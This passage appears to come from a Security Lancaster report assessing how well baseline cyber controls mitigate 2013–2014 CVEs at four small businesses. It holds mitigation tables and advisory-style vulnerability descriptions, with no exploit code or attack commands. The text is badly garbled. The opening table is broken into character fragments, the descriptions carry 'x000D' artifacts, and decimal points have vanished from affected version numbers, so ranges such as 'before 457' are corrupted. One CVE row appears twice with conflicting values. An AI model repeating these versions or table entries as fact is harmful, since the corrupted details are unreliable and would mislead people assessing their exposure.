ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-5

56

1n

nn

nn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-57

51

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-5

75

7n

nn

nm

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lC

VE

-20

13

-58

28

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-6

16

7y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lS

ecu

reC

on

fig

ura

tio

n(C

oo

kie-

del

etio

n)

CV

E-2

01

3-6

18

8y

yn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-62

84

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-6

39

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reS

erve

r)C

VE

-20

13

-64

75

ny

yn

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eF

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-66

60

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-66

99

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-6

70

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-6

97

9n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-6

99

4n

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-7

00

4y

nn

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-7

04

3n

nn

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-F

irm

war

eM

anag

emen

tC

VE

-20

13

-73

89

yn

ny

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

F

irm

war

eM

anag

emen

tC

VE

-20

14

-00

01

yn

yn

nN

ot

Mit

igat

edM

itig

ated

-B

ou

nd

ary

Fir

ewal

lsin

clu

de

anti

-DO

SC

VE

-20

14

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster - Page 16 of 28

CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management

CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE DetailsCVE-2013-0008

rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo

CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo

CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo

CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel

CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795

CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute

CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request

CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors

CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack

CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token

CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception

CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users

CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623

CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013

CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644

and CVE-2013-1374

CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection

CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content

CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call

CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors

CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site

CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743

CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28

CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055

CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676

CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389

CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo

CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386

CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors

CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd

CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU

CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect

confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity

CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169

CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function

CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document

CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors

CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors

CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location

CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28

Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet

CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130

CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring

CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter

CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo

CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo

CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo

CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3206

rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash

CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724

CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262

CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter

CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL

